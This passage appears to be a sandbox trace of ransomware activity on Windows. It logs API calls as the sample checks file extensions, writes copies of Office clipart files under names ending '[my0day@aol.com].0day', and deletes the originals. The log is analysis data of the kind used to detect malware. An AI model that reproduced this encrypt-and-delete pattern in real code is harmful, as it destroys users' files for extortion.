(lpString=".zip") returned 4 [0272.045] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.045] lstrlenW (lpString=".rar") returned 4 [0272.045] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.045] lstrlenW (lpString=".bz2") returned 4 [0272.045] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.045] lstrlenW (lpString=".7z") returned 3 [0272.045] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0272.045] lstrlenW (lpString=".dbf") returned 4 [0272.045] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0272.045] lstrlenW (lpString=".1cd") returned 4 [0272.045] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0272.045] lstrlenW (lpString=".jpg") returned 4 [0272.045] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.045] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.046] lstrlenW (lpString="CG1606.WMF") returned 10 [0272.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.060] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=3564) returned 1 [0272.060] CloseHandle (hObject=0x394) returned 1 [0272.060] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf")) returned 0x20 [0272.074] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0272.074] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.074] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0272.074] GetLastError () returned 0x0 [0272.075] ReadFile (in: hFile=0x3a4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0xdec, lpOverlapped=0x0) returned 1 [0272.078] WriteFile (in: hFile=0x3a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xdf0, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xdf0, lpOverlapped=0x0) returned 1 [0272.079] ReadFile (in: hFile=0x3a4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.079] WriteFile (in: hFile=0x3a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0272.079] SetEndOfFile (hFile=0x3a8) returned 1 [0272.079] CloseHandle (hObject=0x3a8) returned 1 [0272.079] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.079] SetEndOfFile (hFile=0x3a4) returned 1 [0272.082] CloseHandle (hObject=0x3a4) returned 1 [0272.082] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.087] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf")) returned 1 [0272.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0272.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0272.087] lstrlenW (lpString=".doc") returned 4 [0272.087] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.087] lstrlenW (lpString=".docx") returned 5 [0272.087] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0272.087] lstrlenW (lpString=".pdf") returned 4 [0272.087] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.087] lstrlenW (lpString=".xls") returned 4 [0272.087] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.087] lstrlenW (lpString=".xlsx") returned 5 [0272.087] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0272.087] lstrlenW (lpString=".ppt") returned 4 [0272.087] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0272.087] lstrlenW (lpString=".zip") returned 4 [0272.087] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.087] lstrlenW (lpString=".rar") returned 4 [0272.088] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.088] lstrlenW (lpString=".bz2") returned 4 [0272.088] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.088] lstrlenW (lpString=".7z") returned 3 [0272.088] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0272.088] lstrlenW (lpString=".dbf") returned 4 [0272.088] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0272.088] lstrlenW (lpString=".1cd") returned 4 [0272.088] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0272.088] lstrlenW (lpString=".jpg") returned 4 [0272.088] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0272.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0272.088] lstrlenW (lpString=".doc") returned 4 [0272.088] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.088] lstrlenW (lpString=".docx") returned 5 [0272.088] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0272.088] lstrlenW (lpString=".pdf") returned 4 [0272.088] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.088] lstrlenW (lpString=".xls") returned 4 [0272.088] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.088] lstrlenW (lpString=".xlsx") returned 5 [0272.088] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0272.088] lstrlenW (lpString=".ppt") returned 4 [0272.088] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0272.089] lstrlenW (lpString=".zip") returned 4 [0272.089] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.089] lstrlenW (lpString=".rar") returned 4 [0272.089] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.089] lstrlenW (lpString=".bz2") returned 4 [0272.089] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.089] lstrlenW (lpString=".7z") returned 3 [0272.089] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0272.089] lstrlenW (lpString=".dbf") returned 4 [0272.089] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0272.089] lstrlenW (lpString=".1cd") returned 4 [0272.089] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0272.089] lstrlenW (lpString=".jpg") returned 4 [0272.089] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.089] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.089] lstrlenW (lpString="CLASSIC2.WMF") returned 12 [0272.089] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0272.089] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=2262) returned 1 [0272.090] CloseHandle (hObject=0x3a4) returned 1 [0272.090] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf")) returned 0x20 [0272.090] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0272.090] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.090] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0272.090] GetLastError () returned 0x0 [0272.090] ReadFile (in: hFile=0x3a4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x8d6, lpOverlapped=0x0) returned 1 [0272.092] WriteFile (in: hFile=0x3a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x8e0, lpOverlapped=0x0) returned 1 [0272.094] ReadFile (in: hFile=0x3a4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.094] WriteFile (in: hFile=0x3a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.094] SetEndOfFile (hFile=0x3a8) returned 1 [0272.094] CloseHandle (hObject=0x3a8) returned 1 [0272.094] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.094] SetEndOfFile (hFile=0x3a4) returned 1 [0272.097] CloseHandle (hObject=0x3a4) returned 1 [0272.097] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.100] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf")) returned 1 [0272.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0272.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0272.100] lstrlenW (lpString=".doc") returned 4 [0272.100] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.100] lstrlenW (lpString=".docx") returned 5 [0272.100] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0272.100] lstrlenW (lpString=".pdf") returned 4 [0272.100] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.100] lstrlenW (lpString=".xls") returned 4 [0272.100] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.100] lstrlenW (lpString=".xlsx") returned 5 [0272.101] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0272.101] lstrlenW (lpString=".ppt") returned 4 [0272.101] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0272.101] lstrlenW (lpString=".zip") returned 4 [0272.101] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.101] lstrlenW (lpString=".rar") returned 4 [0272.101] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.101] lstrlenW (lpString=".bz2") returned 4 [0272.101] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.101] lstrlenW (lpString=".7z") returned 3 [0272.101] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0272.101] lstrlenW (lpString=".dbf") returned 4 [0272.101] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0272.101] lstrlenW (lpString=".1cd") returned 4 [0272.101] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0272.101] lstrlenW (lpString=".jpg") returned 4 [0272.101] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0272.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0272.101] lstrlenW (lpString=".doc") returned 4 [0272.101] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.101] lstrlenW (lpString=".docx") returned 5 [0272.101] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0272.101] lstrlenW (lpString=".pdf") returned 4 [0272.101] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.101] lstrlenW (lpString=".xls") returned 4 [0272.101] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.101] lstrlenW (lpString=".xlsx") returned 5 [0272.101] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0272.102] lstrlenW (lpString=".ppt") returned 4 [0272.102] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0272.102] lstrlenW (lpString=".zip") returned 4 [0272.102] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.102] lstrlenW (lpString=".rar") returned 4 [0272.102] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.102] lstrlenW (lpString=".bz2") returned 4 [0272.102] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.102] lstrlenW (lpString=".7z") returned 3 [0272.102] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0272.102] lstrlenW (lpString=".dbf") returned 4 [0272.102] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0272.102] lstrlenW (lpString=".1cd") returned 4 [0272.102] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0272.102] lstrlenW (lpString=".jpg") returned 4 [0272.102] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.102] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.102] lstrlenW (lpString="CLIP.WMF") returned 8 [0272.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0272.104] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=2262) returned 1 [0272.104] CloseHandle (hObject=0x3a4) returned 1 [0272.104] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf")) returned 0x20 [0272.104] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0272.104] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.104] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0272.402] GetLastError () returned 0x0 [0272.402] ReadFile (in: hFile=0x3a4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x8d6, lpOverlapped=0x0) returned 1 [0272.485] WriteFile (in: hFile=0x354, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x8e0, lpOverlapped=0x0) returned 1 [0272.486] ReadFile (in: hFile=0x3a4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.486] WriteFile (in: hFile=0x354, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0272.486] SetEndOfFile (hFile=0x354) returned 1 [0272.486] CloseHandle (hObject=0x354) returned 1 [0272.486] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.486] SetEndOfFile (hFile=0x3a4) returned 1 [0272.488] CloseHandle (hObject=0x3a4) returned 1 [0272.488] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.489] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf")) returned 1 [0272.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0272.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0272.489] lstrlenW (lpString=".doc") returned 4 [0272.489] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.489] lstrlenW (lpString=".docx") returned 5 [0272.489] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0272.489] lstrlenW (lpString=".pdf") returned 4 [0272.489] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.489] lstrlenW (lpString=".xls") returned 4 [0272.489] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.489] lstrlenW (lpString=".xlsx") returned 5 [0272.489] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0272.489] lstrlenW (lpString=".ppt") returned 4 [0272.489] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0272.489] lstrlenW (lpString=".zip") returned 4 [0272.489] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.489] lstrlenW (lpString=".rar") returned 4 [0272.489] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.489] lstrlenW (lpString=".bz2") returned 4 [0272.489] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.489] lstrlenW (lpString=".7z") returned 3 [0272.489] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0272.489] lstrlenW (lpString=".dbf") returned 4 [0272.489] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0272.489] lstrlenW (lpString=".1cd") returned 4 [0272.490] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0272.490] lstrlenW (lpString=".jpg") returned 4 [0272.490] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0272.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0272.490] lstrlenW (lpString=".doc") returned 4 [0272.490] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.490] lstrlenW (lpString=".docx") returned 5 [0272.490] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0272.490] lstrlenW (lpString=".pdf") returned 4 [0272.490] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.490] lstrlenW (lpString=".xls") returned 4 [0272.490] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.490] lstrlenW (lpString=".xlsx") returned 5 [0272.490] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0272.490] lstrlenW (lpString=".ppt") returned 4 [0272.490] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0272.490] lstrlenW (lpString=".zip") returned 4 [0272.490] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.490] lstrlenW (lpString=".rar") returned 4 [0272.490] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.490] lstrlenW (lpString=".bz2") returned 4 [0272.490] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.490] lstrlenW (lpString=".7z") returned 3 [0272.490] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0272.490] lstrlenW (lpString=".dbf") returned 4 [0272.490] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.490] lstrlenW (lpString="C:\\Program Files\\Microsoft 